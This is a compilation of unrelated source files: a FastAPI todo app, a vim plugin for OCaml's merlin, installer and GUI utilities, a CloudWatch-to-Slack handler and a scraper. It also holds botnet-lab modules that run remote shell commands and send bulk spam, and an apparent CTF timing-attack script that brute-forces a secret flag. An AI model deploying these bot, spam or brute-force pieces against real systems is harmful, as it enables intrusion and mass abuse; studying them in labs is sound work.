_ = lc.make_custom_lc()
assert isinstance(lc.lc_custom, lk.LightCurve)
def test_lc_triceratops():
"""
"""
lc = LongCadence(ticid=TICID, calc_fpp=True)
# df = sc.get_NEB_depths()
# df = sc.get_fpp(flat=flat, plot=False)
assert lc.triceratops is not None
``` |
{
"source": "jpdeleon/fcc_tutorials",
"score": 2
} |
#### File: webapps/fastapi/app.py
```python
from fastapi import FastAPI, Depends, Request, Form, status
from starlette.responses import RedirectResponse
from starlette.templating import Jinja2Templates
from sqlalchemy.orm import Session
import models
from database import SessionLocal, engine
models.Base.metadata.create_all(bind=engine)
templates = Jinja2Templates(directory="templates")
app = FastAPI()
# Dependency
def get_db():
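    # Yield a per-request database session and make sure it is closed afterwards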
db = SessionLocal()
try:
yield db
finally:
db.close()
@app.get("/")
def home(request: Request, db: Session = Depends(get_db)):
todos = db.query(models.Todo).all()
return templates.TemplateResponse("base.html",
{"request": request, "todo_list": todos})
@app.post("/add")
def add(request: Request, title: str = Form(...), db: Session = Depends(get_db)):
new_todo = models.Todo(title=title)
db.add(new_todo)
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_303_SEE_OTHER)
@app.get("/update/{todo_id}")
def update(request: Request, todo_id: int, db: Session = Depends(get_db)):
todo = db.query(models.Todo).filter(models.Todo.id == todo_id).first()
todo.complete = not todo.complete
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_302_FOUND)
@app.get("/delete/{todo_id}")
def delete(request: Request, todo_id: int, db: Session = Depends(get_db)):
todo = db.query(models.Todo).filter(models.Todo.id == todo_id).first()
db.delete(todo)
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_302_FOUND)
``` |
{
"source": "jpdeplaix/merlin",
"score": 2
} |
#### File: merlin/autoload/merlin.py
```python
import subprocess
import signal
import json
import vim
import re
import os
import sys
from itertools import groupby
import vimbufsync
vimbufsync.check_version("0.1.0",who="merlin")
flags = []
enclosing_types = [] # nothing to see here
current_enclosing = -1
atom_bound = re.compile('[a-z_0-9A-Z\'`.]')
class MerlinExc(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Failure(MerlinExc):
pass
class Error(MerlinExc):
pass
class MerlinException(MerlinExc):
pass
######## COMMUNICATION
class MerlinProcess:
def __init__(self):
self.mainpipe = None
self.saved_sync = None
def restart(self):
if self.mainpipe:
try:
try:
self.mainpipe.terminate()
except OSError:
pass
self.mainpipe.communicate()
except OSError:
pass
try:
command = [vim.eval("merlin#FindOcamlMerlin()"),"-ignore-sigint"]
command.extend(flags)
self.mainpipe = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=None,
)
except OSError as e:
print("Failed starting ocamlmerlin. Please ensure that ocamlmerlin binary\
is executable.")
raise e
def send_command(self, *cmd):
if self.mainpipe == None or self.mainpipe.returncode != None:
self.restart()
json.dump(cmd, self.mainpipe.stdin)
line = self.mainpipe.stdout.readline()
result = json.loads(line)
content = None
if len(result) == 2:
content = result[1]
if result[0] == "return":
return content
elif result[0] == "failure":
raise Failure(content)
elif result[0] == "error":
raise Error(content)
elif result[0] == "exception":
raise MerlinException(content)
merlin_processes = {}
def merlin_process():
global merlin_processes
name = vim.eval("exists('b:merlin_project') ? b:merlin_project : ''")
if not name in merlin_processes:
merlin_processes[name] = MerlinProcess()
return merlin_processes[name]
def send_command(*cmd):
return merlin_process().send_command(*cmd)
def dump(*cmd):
print(send_command('dump', *cmd))
def try_print_error(e, msg=None):
try:
raise e
except Error as e:
if msg: print(msg)
else:
print(e.value['message'])
except Exception as e:
if msg: sys.stderr.write(msg)
else:
msg = str(e)
if re.search('Not_found',msg):
print ("error: Not found")
return None
elif re.search('Cmi_format.Error', msg):
sys.stderr.write ("error: The version of merlin you're using doesn't support this version of ocaml")
return None
sys.stderr.write(msg)
def catch_and_print(f, msg=None):
try:
return f()
except MerlinExc as e:
try_print_error(e, msg=msg)
######## BASIC COMMANDS
def command_reload(full=False):
if full:
return send_command("refresh")
else:
return send_command("refresh", "quick")
def command_reset(name=None):
global saved_sync
if name:
r = send_command("reset","name",name)
else:
r = send_command("reset")
if name == "myocamlbuild.ml":
command_find_use("ocamlbuild")
saved_sync = None
return r
def command_tell(kind,content):
if content == None:
return send_command("tell", "end")
elif type(content) is list:
return send_command("tell", kind, "\n".join(content) + "\n")
else:
return send_command("tell", kind, content)
def command_which_file(name):
return send_command('which', 'path', name)
def command_which_with_ext(ext):
return send_command('which', 'with_ext', ext)
def command_ext_enable(*packages):
return send_command('extension', 'enable', packages)
def command_ext_disable(*packages):
return send_command('extension', 'disable', packages)
def command_ext_list():
return send_command('extension', 'list')
def command_ext_enabled():
return send_command('extension', 'list', 'enabled')
def command_ext_disabled():
return send_command('extension', 'list', 'disabled')
def display_load_failures(result):
if 'failures' in result:
print (result['failures'])
return result['result']
def command_find_use(*packages):
result = catch_and_print(lambda: send_command('find', 'use', packages))
return display_load_failures(result)
def command_find_list():
return send_command('find', 'list')
def command_seek_before(line,col):
position = send_command("seek", "before", {'line' : line, 'col': col})
return (position['line'], position['col'])
def command_seek_exact(line,col):
position = send_command("seek", "exact", {'line' : line, 'col': col})
return (position['line'], position['col'])
def command_seek_scope():
return send_command("seek", "maximize_scope")
def command_seek_end():
return send_command("seek", "end")
def command_complete_cursor(base,line,col):
return send_command("complete", "prefix", base, "at", {'line' : line, 'col': col})
def command_report_errors():
return send_command("errors")
def command_locate(path, line, col):
try:
if line is None or col is None:
return send_command("locate", path)
else:
pos_or_err = send_command("locate", path, "at", {'line': line, 'col': col})
if not isinstance(pos_or_err, dict):
print(pos_or_err)
else:
l = pos_or_err['pos']['line']
c = pos_or_err['pos']['col']
if "file" in pos_or_err:
vim.command(":split %s" % pos_or_err['file'])
vim.current.window.cursor = (l, c)
except MerlinExc as e:
try_print_error(e)
######## BUFFER SYNCHRONIZATION
def sync_buffer_to(to_line, to_col):
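    # Incremental sync: if this buffer was already (partially) sent to merlin,
    # only resend the part that changed since the last sync (tracked by
    # vimbufsync); otherwise reset merlin's view of the file and resend it.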
process = merlin_process()
saved_sync = process.saved_sync
curr_sync = vimbufsync.sync()
cb = vim.current.buffer
max_line = len(cb)
end_line = min(to_line, max_line)
if saved_sync and curr_sync.bufnr() == saved_sync.bufnr():
line, col = saved_sync.pos()
line, col = command_seek_before(line, 0)
if line <= end_line:
rest = cb[line-1][col:]
content = cb[line:end_line]
content.insert(0, rest)
process.saved_sync = curr_sync
else:
content = None
else:
command_reset(name=vim.eval("expand('%:p')"))
content = cb[:end_line]
process.saved_sync = curr_sync
# Send content
if content:
kind = "source"
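        # Stream the buffer to merlin in 20-line chunks ("tell more") until
        # merlin reports it has enough context, sending "tell end" once the
        # buffer is exhausted.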
while not command_tell(kind,content):
kind = "more"
if end_line < max_line:
next_end = min(max_line,end_line + 20)
content = cb[end_line:next_end]
end_line = next_end
else:
content = None
# Now we are synced, come back to environment around cursor
command_seek_exact(to_line, to_col)
def sync_buffer():
to_line, to_col = vim.current.window.cursor
sync_buffer_to(to_line, to_col)
def sync_full_buffer():
sync_buffer_to(len(vim.current.buffer),0)
def vim_complete_cursor(base, vimvar):
vim.command("let %s = []" % vimvar)
line, col = vim.current.window.cursor
wspaces = re.compile("[\n ]+")
try:
sync_buffer()
props = command_complete_cursor(base,line,col)
for prop in props:
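            # Build a vimscript dictionary for each completion candidate; single
            # quotes are doubled to escape them inside vim's string literal and
            # whitespace in the description is collapsed to a single space.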
vim.command("let l:tmp = {'word':'%s','menu':'%s','info':'%s','kind':'%s'}" %
(prop['name'].replace("'", "''")
,re.sub(wspaces, " ", prop['desc']).replace("'", "''")
,prop['info'].replace("'", "''")
,prop['kind'][:1].replace("'", "''")
))
vim.command("call add(%s, l:tmp)" % vimvar)
except MerlinExc as e:
try_print_error(e)
def vim_loclist(vimvar, ignore_warnings):
vim.command("let %s = []" % vimvar)
errors = command_report_errors()
bufnr = vim.current.buffer.number
nr = 0
for error in errors:
if error['type'] == 'warning' and vim.eval(ignore_warnings) == 'true':
continue
ty = 'w'
if error['type'] == 'type' or error['type'] == 'parser':
ty = 'e'
lnum = 1
lcol = 1
        if 'start' in error:
lnum = error['start']['line']
lcol = error['start']['col'] + 1
vim.command("let l:tmp = {'bufnr':%d,'lnum':%d,'col':%d,'vcol':0,'nr':%d,'pattern':'','text':'%s','type':'%s','valid':1}" %
(bufnr, lnum, lcol, nr, error['message'].replace("'", "''").replace("\n", " "), ty))
nr = nr + 1
vim.command("call add(%s, l:tmp)" % vimvar)
def vim_find_list(vimvar):
pkgs = command_find_list()
vim.command("let %s = []" % vimvar)
for pkg in pkgs:
vim.command("call add(%s, '%s')" % (vimvar, pkg))
def vim_type(expr,is_approx=False):
to_line, to_col = vim.current.window.cursor
cmd_at = ["at", {'line':to_line,'col':to_col}]
sync_buffer_to(to_line,to_col)
cmd_expr = ["expression", expr] if expr else []
try:
cmd = ["type"] + cmd_expr + cmd_at
ty = send_command(*cmd)
if isinstance(ty,dict):
if "type" in ty: ty = ty['type']
else: ty = str(ty)
if is_approx: sys.stdout.write("(approx) ")
if expr: print(expr + " : " + ty)
else: print(ty)
except MerlinExc as e:
if re.search('Not_found',str(e)):
pass
else:
try_print_error(e)
def vim_locate_at_cursor(path):
line, col = vim.current.window.cursor
sync_buffer_to(line, col)
command_locate(path, line, col)
def vim_locate_under_cursor():
delimiters = [' ', '\n', '=', ';', ',', '(', ')', '[', ']', '{', '}', '|', '"',"+","-","*","/" ]
line_nb, col_nb = vim.current.window.cursor
line = vim.current.buffer[line_nb - 1]
start = col_nb
stop = col_nb
while start > 0:
if line[start - 1] in delimiters:
break
else:
start -= 1
while stop < len(line):
# we stop on dots because on "Foo.Ba<cursor>r.Baz.lol" I want to jump at the
# definition of Bar, not the one of lol.
if line[stop] in delimiters or line[stop] == '.':
break
else:
stop += 1
vim_locate_at_cursor(line[start:stop])
def bounds_of_ocaml_atom_at_pos(to_line, col):
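    # Widen [start, stop) around `col` as long as the characters match
    # atom_bound, i.e. can belong to an OCaml identifier or module path.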
line = vim.current.buffer[to_line]
start = col
stop = col
while start > 0:
if atom_bound.match(line[start - 1]) is None:
break
else:
start -= 1
while stop < len(line):
if atom_bound.match(line[stop]) is None:
break
else:
stop += 1
return (line[start:stop], start, stop)
# expr used as fallback in case type_enclosing fail
def vim_type_enclosing(vimvar,expr=None):
global enclosing_types
global current_enclosing
enclosing_types = [] # reset
current_enclosing = -1
to_line, to_col = vim.current.window.cursor
atom, a_start, a_end = bounds_of_ocaml_atom_at_pos(to_line - 1, to_col)
offset = to_col - a_start
pos = {'line':to_line, 'col':to_col}
arg = {'expr':atom, 'offset':offset}
sync_buffer()
try:
enclosing_types = send_command("type", "enclosing", arg, pos)
if enclosing_types != []:
vim_next_enclosing(vimvar)
else:
print("didn't manage to type '%s'" % atom)
except MerlinExc as e:
try_print_error(e)
def easy_matcher(start, stop):
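    # Build a vim match pattern for the region between start and stop using the
    # zero-width line/column atoms \%>l, \%>c, \%<l and \%<c.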
startl = ""
startc = ""
if start['line'] > 0:
startl = "\%>{0}l".format(start['line'] - 1)
if start['col'] > 0:
startc = "\%>{0}c".format(start['col'])
return '{0}{1}\%<{2}l\%<{3}c'.format(startl, startc, stop['line'] + 1, stop['col'] + 1)
def hard_matcher(start, stop):
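    # A region spanning several lines is matched as the union of three simpler
    # patterns: the tail of the first line, the middle lines, and the head of
    # the last line.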
first_start = {'line' : start['line'], 'col' : start['col']}
first_stop = {'line' : start['line'], 'col' : 4242}
first_line = easy_matcher(first_start, first_stop)
mid_start = {'line' : start['line']+1, 'col' : 0}
mid_stop = {'line' : stop['line']-1 , 'col' : 4242}
middle = easy_matcher(mid_start, mid_stop)
last_start = {'line' : stop['line'], 'col' : 0}
last_stop = {'line' : stop['line'], 'col' : stop['col']}
last_line = easy_matcher(last_start, last_stop)
return "{0}\|{1}\|{2}".format(first_line, middle, last_line)
def make_matcher(start, stop):
if start['line'] == stop['line']:
return easy_matcher(start, stop)
else:
return hard_matcher(start, stop)
def vim_next_enclosing(vimvar):
if enclosing_types != []:
global current_enclosing
if current_enclosing < len(enclosing_types):
current_enclosing += 1
if current_enclosing < len(enclosing_types):
tmp = enclosing_types[current_enclosing]
matcher = make_matcher(tmp['start'], tmp['end'])
vim.command("let {0} = matchadd('EnclosingExpr', '{1}')".format(vimvar, matcher))
print(tmp['type'])
def vim_prev_enclosing(vimvar):
if enclosing_types != []:
global current_enclosing
if current_enclosing >= 0:
current_enclosing -= 1
if current_enclosing >= 0:
tmp = enclosing_types[current_enclosing]
matcher = make_matcher(tmp['start'], tmp['end'])
vim.command("let {0} = matchadd('EnclosingExpr', '{1}')".format(vimvar, matcher))
print(tmp['type'])
# Resubmit current buffer
def vim_reload_buffer():
clear_cache()
sync_buffer()
# Reload changed cmi files then retype all definitions
def vim_reload(full=False):
command_reload(full)
# Spawn a fresh new process
def vim_restart():
merlin_process().restart()
path = vim.eval("expand('%:p')")
load_project(path, force=True)
def vim_which(name,ext):
if ext:
name = name + "." + ext
return command_which_file(name)
def vim_which_ext(ext,vimvar):
files = command_which_with_ext(ext)
vim.command("let %s = []" % vimvar)
for f in sorted(set(files)):
vim.command("call add(%s, '%s')" % (vimvar, f))
def vim_use(*args):
return command_find_use(*args)
def vim_ext(enable, exts):
if enable:
catch_and_print(lambda: command_ext_enable(*exts))
else:
catch_and_print(lambda: command_ext_disable(*exts))
def vim_ext_list(vimvar,enabled=None):
if enabled == None:
exts = command_ext_list()
elif enabled:
exts = command_ext_enabled()
else:
exts = command_ext_disabled()
vim.command("let %s = []" % vimvar)
for ext in exts:
vim.command("call add(%s, '%s')" % (vimvar, ext))
def vim_clear_flags():
global flags
flags = []
vim_restart()
def vim_add_flags(*args):
flags.extend(args)
vim_restart()
def vim_selectphrase(l1,c1,l2,c2):
# In some context, vim set column of '> to 2147483647 (2^31 - 1)
# This cause the merlin json parser on 32 bit platforms to overflow
bound = 2147483647 - 1
vl1 = min(bound,int(vim.eval(l1)))
vc1 = min(bound,int(vim.eval(c1)))
vl2 = min(bound,int(vim.eval(l2)))
vc2 = min(bound,int(vim.eval(c2)))
sync_buffer_to(vl2,vc2)
command_seek_exact(vl2,vc2)
loc2 = send_command("boundary")
if vl2 != vl1 or vc2 != vc1:
command_seek_exact(vl1,vc1)
loc1 = send_command("boundary")
else:
loc1 = None
if loc2 == None:
return
vl1 = loc2[0]['line']
vc1 = loc2[0]['col']
vl2 = loc2[1]['line']
vc2 = loc2[1]['col']
if loc1 != None:
vl1 = min(loc1[0]['line'], vl1)
vc1 = min(loc1[0]['col'], vc1)
vl2 = max(loc1[1]['line'], vl2)
vc2 = max(loc1[1]['col'], vc2)
for (var,val) in [(l1,vl1),(l2,vl2),(c1,vc1),(c2,vc2)]:
vim.command("let %s = %d" % (var,val))
def load_project(directory,force=False):
command = [vim.eval("merlin#FindOcamlMerlin()"), "-project-find", directory]
process = subprocess.Popen(command, stdout=subprocess.PIPE)
name = process.communicate()[0].strip()
if not force:
if name == vim.eval("b:merlin_project"): return
vim.command("let b:merlin_project = '%s'" % name)
fnames = display_load_failures(catch_and_print(lambda: send_command("project","find",directory)))
if isinstance(fnames, list):
vim.command('let b:dotmerlin=[%s]' % ','.join(map(lambda fname: '"'+fname+'"', fnames)))
sync_buffer_to(1, 0)
``` |
{
"source": "jpdesigns316/item-catalog",
"score": 3
} |
#### File: item-catalog/src/runme.py
```python
from tempfile import mkstemp
from shutil import move
from os import close, remove
import os
import fileinput
class InstallationMenu(object):
def __init__(self):
self.menu_options = ["Programming by Reading Installation Menu",
"Purge Old Data and Create New Database",
"Set Client ID",
"Install modules",
"Run Server",
"Quit"]
self.old_client_id = "844476090512-hq31f24hb62jg757e22im6hnjp513k37"
self.menu()
# Deletes the books.db then creates and populates a new books.db
def purge_db(self):
os.system("del books.db")
os.system("python database_setup.py")
print "Populating database with default books."
os.system("python add_books_to_db.py")
self.menu()
# This will change the old client id (self.old_client_id) and replace it
# with the one you input. It will then save the one you inputed into the
# old client Id so it can easily be changed at a later date.
def set_client_id(self):
print "Client ID is currently on ", self.old_client_id
client_id = raw_input("Enter your client id: ")
file_path = 'templates/base.jinja2'
fh, abs_path = mkstemp()
with open(abs_path,'w') as new_file:
with open(file_path) as old_file:
for line in old_file:
new_file.write(line.replace(self.old_client_id, client_id))
self.old_client_id = client_id
close(fh)
#Remove original file
remove(file_path)
#Move new file
move(abs_path, file_path)
self.menu()
def install(self):
os.system('pip install -r requirements.txt')
self.menu()
def runserver(self):
os.system('python run.py')
def menu(self):
selection = {1 : self.purge_db,
2 : self.set_client_id,
3 : self.install,
4 : self.runserver,
5 : exit}
for x in range(0,len(self.menu_options)):
if x > 0:
print x,
print self.menu_options[x]
        choice = int(raw_input("Enter your choice: "))
        if choice < 1 or choice > len(self.menu_options) - 1:
print "Invalid Choice!"
self.menu()
selection.get(choice)()
menu = InstallationMenu()
``` |
{
"source": "jpdh88/ableton_samples_cleanup",
"score": 3
} |
#### File: jpdh88/ableton_samples_cleanup/MAIN_PROGRAM.py
```python
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
# ------------------------------
# METHODS: for searching folders and building lists
from fn_search_for_all_samples import fn_search_for_all_samples
from fn_search_ableton_projects import fn_search_ableton_projects
from fns_manip_sample_files import fn_move_sample_files
from fns_manip_sample_files import fn_copy_sample_files
from fn_find_unused_samples import fn_find_unused_samples
# ------------------------------
# METHODS: for moving items between the tkinter objects
# - move an item from the left listbox to the right listbox
def tk_move_items_right ():
li_samples_on_right = list(tkLB_samples_to_move.get(0, END)) # copy existing contents to array
li_samples_on_left = list(tkLB_unused_samples.get(0, END))
li_samples_to_move = [tkLB_unused_samples.get(item) for item in tkLB_unused_samples.curselection()]
for item in li_samples_to_move:
if item not in li_samples_on_right:
# colour item in left listbox
item_index = li_samples_on_left.index(item)
tkLB_unused_samples.itemconfig(item_index, bg="gray")
# add item to right array
li_samples_on_right.append(item)
# delete existing contents (we have already copied them to an array)
tkLB_samples_to_move.delete(0, END)
# populate the right listbox with modified right array
for item in li_samples_on_right:
tkLB_samples_to_move.insert(END, item)
# - remove an item from the right listbox
def tk_remove_items_right ():
li_samples_on_left = list(tkLB_unused_samples.get(0, END))
li_samples_on_right = list(tkLB_samples_to_move.get(0, END))
li_items_to_remove = [tkLB_samples_to_move.get(item) for item in tkLB_samples_to_move.curselection()]
for item in li_items_to_remove:
# remove colouring from item in left listbox
item_index = li_samples_on_left.index(item)
tkLB_unused_samples.itemconfig(item_index, bg="white")
# remove item from right array
li_samples_on_right.remove(item)
# delete existing contents (we have already copied them to an array)
tkLB_samples_to_move.delete(0, END)
# populate the right listbox with modified right array
for item in li_samples_on_right:
tkLB_samples_to_move.insert(END, item)
li_samples_to_move = []
# - Widget call method: find all unused samples and write them to the left listbox
def tk_add_unused_samples ():
li_unused_samples = fn_find_unused_samples( fn_search_for_all_samples(tkEN_samples_folder.get()),\
fn_search_ableton_projects(tkEN_projects_folder.get())\
)
tkLB_samples_to_move.delete(0, END)
tkLB_unused_samples.delete(0, END)
for index, item in enumerate(li_unused_samples):
tkLB_unused_samples.insert(END, item)
# METHODS: for moving and copying files
# - Confirmation dialogue
def tk_confirm_box (message):
response = messagebox.askquestion ( "Confirmation", \
"Are you sure you want to " + message + " these files? You can't undo this.",\
icon = "warning")
return response
# - Widget call method: MOVE selected files to new location
def tk_move_samples ():
if tk_confirm_box("move") == "yes":
fn_move_sample_files( tkEN_samples_folder.get(), \
tkEN_new_folder.get(), \
list(tkLB_samples_to_move.get(0, END)) \
)
tkLB_samples_to_move.delete(0, END)
tkLB_unused_samples.delete(0, END)
tk_add_unused_samples ()
# - Widget call method: COPY selected files to new location
def tk_copy_samples ():
if tk_confirm_box("copy") == "yes":
fn_copy_sample_files( tkEN_samples_folder.get(), \
tkEN_new_folder.get(), \
list(tkLB_samples_to_move.get(0, END)) \
)
# ------------------------------
# CONFIGURE GUI
root = Tk()
root.title("Sample Search and Move")
# - set window attributes
root.resizable(False, False)
window_width = 1000
window_height = 700
bg_color = "#F3E5AB"
root.geometry(str(window_width) + "x" + str(window_height))
root.configure(background=bg_color)
# ------------------------------
# DRAW GUI
# - separator line
canvas = Canvas(root, width=window_width, height=window_height, background=bg_color)
canvas.create_line(5, 70, window_width-5, 70, width=2)
canvas.place(x = 0, y = 0)
# - create Entry: for user to input samples folder
tkLB_samples_folder = Label(root, text="Samples directory:")
tkLB_samples_folder.place(x = 5, y = 6) #DRAW
tkEN_samples_folder = Entry(root, width=77)
tkEN_samples_folder.place(x = 140, y = 5) #DRAW
tkEN_samples_folder.insert(0, "/Users/josephhaley/Music/*samples folder*/")
# - create Entry: for user to input projects folder
tkLB_projects_folder = Label(root, text="Projects directory:")
tkLB_projects_folder.place(x = 5, y = 35) #DRAW
tkEN_projects_folder = Entry(root, width=77)
tkEN_projects_folder.place(x = 140, y = 35) #DRAW
tkEN_projects_folder.insert(0, "/Users/josephhaley/Music/*projects folder*/")
# - create Button: search for unused samples
tkBU_samples_folder = Button(root, text="Find unused samples", \
height=3, \
command=tk_add_unused_samples)
tkBU_samples_folder.place(x = window_width-150, y = 7)
# - create Listbox: list of unused samples
tkLL_unused_samples = Label(root, text="All unused samples")
tkLL_unused_samples.place(x = 270, y = 76)
tkLB_unused_samples = Listbox(root, width=40, selectmode=EXTENDED, borderwidth=2)
tkLB_unused_samples.place(x = 5, y = 104, width = 400, height = 525) #DRAW
# - create Listbox: samples to move
tkLL_samples_to_move = Label(root, text="Samples to be moved")
tkLL_samples_to_move.place(x = 592, y = 76)
tkLB_samples_to_move = Listbox(root, width=40, selectmode=EXTENDED, borderwidth=2)
tkLB_samples_to_move.place(x = 592, y = 104, width = 400, height = 525) #DRAW
# - create Button: move item from left to right
tkBU_samples_folder = Button(root, text="Move to > > >", command=tk_move_items_right)
tkBU_samples_folder.place(x = 450, y = 280)
# - create Button: remove item from right and dehighlight item in left
tkBU_samples_folder = Button(root, text="Remove item", command=tk_remove_items_right)
tkBU_samples_folder.place(x = 450, y = 315)
# - separator line
canvas.create_line(5, window_height-36, window_width-5, window_height-36, width=2)
canvas.place(x = 0, y = 0)
# - create Entry: for user to input new samples folder
tkLB_new_folder = Label(root, text="Move samples to:")
tkLB_new_folder.place(x = 5, y = window_height-31) #DRAW
tkEN_new_folder = Entry(root, width=69)
tkEN_new_folder.place(x = 140, y = window_height-32) #DRAW
tkEN_new_folder.insert(0, "/Users/josephhaley/Music/*new samples folder*")
# - create Button: move samples to new folder
tkBU_move_samples = Button (root, \
text="MOVE samples", \
command=tk_move_samples)
tkBU_move_samples.place(x = window_width-110, y=window_height-31)
# - create Button: copy samples to new folder
tkBU_move_samples = Button (root, \
text="COPY samples", \
command=tk_copy_samples)
tkBU_move_samples.place(x = window_width-220, y=window_height-31)
# ------------------------------
root.mainloop()
``` |
{
"source": "jpdhas/cloudwatch_alarm_to_slack",
"score": 3
} |
#### File: cloudwatch_alarm_to_slack/events/cloudwatch.py
```python
import cloudwatch_alarm_to_slack.utils.log as log
from cloudwatch_alarm_to_slack.events.slack import Slack
from cloudwatch_alarm_to_slack.models.cloudwatch import (CloudwatchEvent,
CloudwatchTrigger)
LOGGER = log.custom_logger(__name__)
class CloudwatchAlarm:
"""Handle a cloudwatch alarm from SNS."""
@staticmethod
def process_alarm(alarm={}):
"""Process incoming cloudwatch alarm."""
cloudwatch_event = CloudwatchEvent(
account=alarm.get('AWSAccountId'),
name=alarm.get('AlarmName'),
description=alarm.get('AlarmDescription'),
region=alarm.get('Region'),
state=alarm.get('NewStateValue'),
trigger=CloudwatchTrigger(
metric=alarm.get('Trigger').get('MetricName'),
namespace=alarm.get('Trigger').get('Namespace'),
statistic=alarm.get('Trigger').get('Statistic'),
comparison_operator=alarm.get('Trigger').get('ComparisonOperator'),
threshold=alarm.get('Trigger').get('Threshold'),
period=alarm.get('Trigger').get('Period'),
evaluation_period=alarm.get('Trigger').get('EvaluationPeriods')
)
)
LOGGER.info(' Processing Cloudwatch event: %s', cloudwatch_event)
alarm_state = CloudwatchAlarm.message_status(alarm_state=alarm.get('NewStateValue'))
attachment = Slack.format_message(
alarm=cloudwatch_event,
state=alarm_state
)
Slack().send_message(
attachment=attachment
)
@staticmethod
def message_status(alarm_state=None):
"""Set status of slack message based on cloudwatch alarm status."""
if alarm_state == "ALARM":
color = "danger"
elif alarm_state == "OK":
color = "good"
else:
color = "warning"
return color
```
#### File: cloudwatch_alarm_to_slack/tests/conftest.py
```python
import pytest
@pytest.fixture(autouse=True)
def default_env_vars(monkeypatch):
"""Set default environment variables."""
monkeypatch.setenv('SLACK_BOT_TOKEN', '<PASSWORD>token')
monkeypatch.setenv('SLACK_CHANNEL', 'test_slack_channel')
``` |
{
"source": "jpdias/botnet-lab",
"score": 3
} |
#### File: bot/addons/shell.py
```python
import subprocess
def shell(cmd):
try:
output = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0]
return output.replace("\r", " - ").replace("\n", " - ")
except:
output = "FAILED"
return output
```
#### File: bot/addons/spam.py
```python
import urllib2
import mandrillwrapper
# spam->http://pastebin.com/raw.php?i=qzCh8DCe-http://pastebin.com/raw.php?i=AAF54Du3
# http://pastebin.com/raw.php?i=PRm68quh
def spam(to_url, msg_url):
# print to_url +" "+msg_url
try:
to_data = urllib2.urlopen(to_url)
msg_data = urllib2.urlopen(msg_url)
to_list = []
msgs = ""
for mail in to_data:
to_list.append(mail)
for txt in msg_data:
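            # The message source is expected to carry FROM:, SUBJECT: and APIKEY:
            # header lines; every other line is appended to the message body.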
if txt.find('FROM') != -1:
fromadd = txt.split(":")[1]
elif txt.find('SUBJECT') != -1:
subj = txt.split(":")[1]
elif txt.find('APIKEY') != -1:
apikey = txt.split(":")[1]
else:
msgs += txt
except:
return "Failed to retrieve sources."
try:
post_mail(to_list, msgs, subj, fromadd, apikey)
return "Send"
except:
return "Failed to send."
def post_mail(to_list, msgs, subj, fromadd, apikey):
mandrill_client = mandrillwrapper.Mandrill(apikey.replace("\n", "").replace("\r", ""))
message = {
'from_email': fromadd,
'from_name': fromadd.split("@")[0],
'html': '<p>' + msgs + '</p>',
'important': False,
'merge': True,
'subject': subj,
'to': [{'email': ",".join(to_list)}]
}
mandrill_client.messages.send(message=message, async=False)
``` |
{
"source": "jpdias/jpdias.github.io",
"score": 3
} |
#### File: assets/summer2020/streamside.py
```python
import requests
import datetime
import string
import sys
ALPHABET = string.printable
RETRIES = 1
def fetch(url, datain):
dataa = {"flag": datain}
r = requests.post(url, data = dataa)
return r.elapsed.total_seconds()
def main(url):
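    # Timing side-channel: for each position, try every printable character and
    # keep the one whose request takes the longest to come back.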
pass_so_far = '<PASSWORD>'
while True:
print('\n[>] Password so far: "%s"\n' % pass_so_far)
times = {}
for p in ALPHABET:
times[p] = 0
            password = pass_so_far + p
#reduce false-positives
t = min(fetch(url, password),fetch(url, password))
times[p] = t
if ord(p) > 32:
print('\tLetter: "%s" - time: %f' % (password, t))
max_time = [0,0]
for item in times:
if times[item] > max_time[1]:
max_time[0] = item
max_time[1] = times[item]
pass_so_far += max_time[0]
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('usage: http-auth-timing.py <url>')
        sys.exit(1)
main(sys.argv[1])
``` |
{
"source": "jpdillingham/Kodi-StereoSnitch",
"score": 3
} |
#### File: jpdillingham/Kodi-StereoSnitch/stereosnitch.py
```python
import sys
import os
import re
# Search the specified directory for all *.nfo files
def searchdirectory(directory):
print("Searching directory " + directory + "...")
for root, dirs, files in os.walk(directory, topdown=False):
for name in files:
if name.endswith(".nfo"):
checknfo(os.path.join(root, name))
# Check the contents of the specified NFO for 2 channel audio
def checknfo(nfo):
contents = readfile(nfo)
try:
m = re.search(r"<channels>(.*)<\/channels>", contents)
if m.group(1) == '2':
print(nfo)
except:
pass
# Read and return the contents of the specified file
# If the read fails for any reason, return an empty string
def readfile(filename):
try:
with open(filename) as f:
return f.read()
except:
return ""
# Check the input, and if it is valid search the specified directory
if len(sys.argv) == 1:
print("Specify a directory to search.")
elif not os.path.isdir(sys.argv[1]):
print("Directory '" + sys.argv[1] + "' not found.")
else:
searchdirectory(sys.argv[1])
``` |
{
"source": "jpdoe/Engeto-python-project-3",
"score": 3
} |
#### File: jpdoe/Engeto-python-project-3/csv_writter.py
```python
import csv
import sys
def write_csv(file, data):
with open(file + ".csv", "w", newline="") as csv_file:
header = data[0].keys()
writer = csv.DictWriter(csv_file, fieldnames=header)
try:
writer.writeheader()
writer.writerows(data)
except csv.Error as e:
sys.exit(f"CSV Error: {e}")
```
#### File: jpdoe/Engeto-python-project-3/el_scraper.py
```python
import sys
import requests
from bs4 import BeautifulSoup
import csv_writter
def check_args(bad_urls, base_url, argv):
if len(argv) == 3:
try:
url = str(argv[1])
csv_file = str(argv[2])
if (base_url not in url) or url in bad_urls:
sys.exit("Wrong URL for scraping")
else:
return url, csv_file
except ValueError:
sys.exit("Wrong type of arguments")
else:
sys.exit("Wrong number of arguments")
def get_soup(url):
try:
page = requests.get(url)
return BeautifulSoup(page.text, "html.parser")
except requests.exceptions.ConnectionError as e:
sys.exit(f"Problem with connection: {e}")
def norm_int(string):
# replace unicode non-breakable space
try:
return int(string.replace("\xa0", ""))
except ValueError as e:
sys.exit(f"Problem with value: {e}")
def get_municip_info(url, muni):
# prepare alphabet soup
soup = get_soup(url)
muni["registered"] = norm_int(soup.find("td", {"headers": "sa2"}).text)
muni["envelopes"] = norm_int(soup.find("td", {"headers": "sa3"}).text)
muni["valid"] = norm_int(soup.find("td", {"headers": "sa6"}).text)
# parties table
tables = soup.find_all("table", {"class": "table"})[1:]
for table in tables:
# extract table rows and remove header
